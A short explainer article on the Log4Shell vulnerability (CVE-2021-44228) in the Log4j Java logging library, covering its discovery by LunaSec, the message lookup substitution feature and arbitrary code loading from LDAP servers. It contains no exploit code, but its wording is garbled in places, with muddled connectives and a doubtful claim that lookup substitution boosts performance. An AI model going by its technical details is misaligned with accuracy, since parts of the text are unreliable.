What is Log4Shell (Log4j Vulnerability): Zero Day Critical Vulnerability
According to cybersecurity researchers, an exploitable software flaw might allow attackers to get uncontrolled access to computer systems. This anomaly was discovered by scientists at LunaSec, who were the first to observe it. LunaSec, on the other hand, cautions that "a large number of services" are exposed to this vulnerability as a result of Log4j's "ubiquitous" presence, which was discovered in the Microsoft-owned video game Minecraft.
If an attacker gains control of a computer system and has the ability to run 'arbitrary code' on it, the system can be compromised.
An attacker who is successful in exploiting this vulnerability has the ability to take complete control of the target server.
As a result, the Log4j Java library is widely used by software developers all over the world to keep track of every action that occurs within an application, and it is thus quite popular among software developers worldwide.
It is enabled by default in the program. This logging feature is known as "Message Lookup Substitution."
This feature allows some specific strings to be substituted by other dynamically generated strings throughout the logging process, hence boosting performance.
As of the time of this writing, it has been assigned the CVE-2021-44228 number, which is the official identification given to each software vulnerability as members of the security industry discover it.
When message lookup substitution is allowed, according to the technical description in the CVE library, "An attacker who has influence over log messages or log message parameters can cause arbitrary code to be loaded from LDAP servers."
Because exploitation has very probably been exploited by hackers to gain access to specific computer systems, the fact that the vulnerability has been made public should be viewed with extreme caution. Now that the exploit has been made public, companies will be forced to fix the damage as soon as is realistically feasible.